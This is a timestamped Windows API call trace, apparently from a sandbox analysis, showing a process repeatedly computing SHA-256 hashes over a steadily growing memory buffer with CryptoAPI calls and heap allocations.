	[0187.392] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.392] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.392] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.392] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.392] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0187.392] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.392] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e5b8
	[0187.392] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e5b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e5b8, pdwDataLen=0x128aac) returned 1
	[0187.392] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.392] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.393] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.393] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.393] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0187.393] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e5e0
	[0187.393] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e5e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e5e0, pdwDataLen=0x128aac) returned 1
	[0187.393] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.393] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.393] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.394] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.394] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0187.394] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.394] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e608
	[0187.394] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e608, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e608, pdwDataLen=0x128aac) returned 1
	[0187.394] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.394] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.394] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.394] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.394] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0187.394] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.394] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e630
	[0187.394] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e630, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e630, pdwDataLen=0x128aac) returned 1
	[0187.394] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.394] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.394] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.395] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.395] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0187.395] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.395] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e658
	[0187.395] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e658, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e658, pdwDataLen=0x128aac) returned 1
	[0187.395] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.395] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.395] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.395] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.395] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0187.395] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.395] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e680
	[0187.395] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e680, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e680, pdwDataLen=0x128aac) returned 1
	[0187.395] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.395] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.395] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.395] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.396] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0187.396] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.396] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e6a8
	[0187.396] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e6a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e6a8, pdwDataLen=0x128aac) returned 1
	[0187.396] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.396] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.396] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.396] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.396] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0187.396] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.396] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e6d0
	[0187.396] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e6d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e6d0, pdwDataLen=0x128aac) returned 1
	[0187.396] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.396] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.396] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.396] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.396] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0187.397] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e6f8
	[0187.397] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e6f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e6f8, pdwDataLen=0x128aac) returned 1
	[0187.397] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.397] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.397] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.397] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.397] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0187.397] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e720
	[0187.397] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e720, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e720, pdwDataLen=0x128aac) returned 1
	[0187.397] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.397] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.397] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.398] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.398] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0187.398] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.398] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e748
	[0187.398] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e748, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e748, pdwDataLen=0x128aac) returned 1
	[0187.398] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.398] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.398] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.398] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.398] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0187.398] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.398] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e770
	[0187.398] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e770, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e770, pdwDataLen=0x128aac) returned 1
	[0187.398] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.398] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.398] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.399] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.399] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0187.399] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.399] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e798
	[0187.399] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e798, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e798, pdwDataLen=0x128aac) returned 1
	[0187.399] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.399] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.399] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.399] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.399] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0187.399] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.399] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e7c0
	[0187.399] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e7c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e7c0, pdwDataLen=0x128aac) returned 1
	[0187.399] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.399] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.399] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.400] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.400] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0187.400] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.400] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e7e8
	[0187.400] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e7e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e7e8, pdwDataLen=0x128aac) returned 1
	[0187.400] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.400] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.400] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.400] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.400] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0187.400] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.400] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e810
	[0187.400] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e810, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e810, pdwDataLen=0x128aac) returned 1
	[0187.400] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.400] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.400] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.401] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.401] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0187.401] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e838
	[0187.401] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e838, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e838, pdwDataLen=0x128aac) returned 1
	[0187.401] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.401] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.401] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.401] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.401] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0187.401] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e860
	[0187.401] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e860, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e860, pdwDataLen=0x128aac) returned 1
	[0187.401] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.401] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.401] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.402] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.402] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0187.402] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.402] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e888
	[0187.402] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e888, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e888, pdwDataLen=0x128aac) returned 1
	[0187.402] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.402] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.402] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.402] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.402] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0187.402] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.402] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e8b0
	[0187.402] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e8b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e8b0, pdwDataLen=0x128aac) returned 1
	[0187.402] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.402] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.403] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.403] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.403] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0187.403] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.403] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e8d8
	[0187.403] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e8d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e8d8, pdwDataLen=0x128aac) returned 1
	[0187.403] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.403] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.403] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.404] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.404] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0187.404] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.404] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e900
	[0187.404] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e900, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e900, pdwDataLen=0x128aac) returned 1
	[0187.404] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.404] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.404] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.404] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.404] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0187.404] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.404] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e928
	[0187.404] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e928, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e928, pdwDataLen=0x128aac) returned 1
	[0187.404] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.404] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.404] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.405] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.405] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0187.405] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.405] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e950
	[0187.405] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e950, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e950, pdwDataLen=0x128aac) returned 1
	[0187.405] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.405] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.405] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.405] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.405] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0187.405] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.405] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e978
	[0187.405] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e978, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e978, pdwDataLen=0x128aac) returned 1
	[0187.405] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.405] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
